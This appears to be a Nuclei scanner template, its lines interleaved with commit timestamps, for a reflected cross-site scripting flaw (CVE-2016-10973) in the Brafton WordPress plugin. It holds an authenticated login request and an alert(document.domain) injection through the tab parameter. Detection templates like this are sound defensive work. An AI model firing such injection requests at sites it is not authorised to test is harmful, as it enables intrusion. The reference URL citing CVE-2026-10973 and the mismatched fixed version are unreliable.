2023-06-25 11:43:30 +00:00
id : CVE-2016-10973
info :
2023-07-06 17:19:11 +00:00
name : Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting
2023-06-25 11:43:30 +00:00
author : Harsh
severity : medium
description : |
The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.
2023-06-25 11:43:30 +00:00
reference :
- https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd
- https://nvd.nist.gov/vuln/detail/CVE-2026-10973
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2016-10973
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00177
2023-12-12 11:07:52 +00:00
epss-percentile : 0.54754
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
2023-06-25 11:43:30 +00:00
metadata :
2023-07-10 05:08:33 +00:00
verified : true
2023-09-06 13:22:34 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : brafton
product : brafton
2023-09-06 13:22:34 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : wpscan,cve,cve2016,wordpress,wp,wp-plugin,xss,brafton,authenticated
2023-06-25 11:43:30 +00:00
2023-07-06 17:19:11 +00:00
http :
2023-07-10 05:08:33 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-06-25 11:43:30 +00:00
2023-07-10 05:08:33 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
Host : {{Hostname}}
2023-06-25 11:43:30 +00:00
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
2023-07-10 05:08:33 +00:00
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "tab = alert(document.domain);")'
2023-06-25 11:43:30 +00:00
- 'contains(body_2, "Brafton Article Loader")'
condition : and
2023-12-29 09:30:44 +00:00
# digest: 490a004630440220274c8fe4864f25f22fde055c7b74f729cbd20ad92e09493514b7e5eafce9593f022040e51a5e6f0350c7fae9de1ecbe382c2cfb9fbc97f9dfb9c2db2682a23c2891f:922c64590222798bb761d5b6d8e72950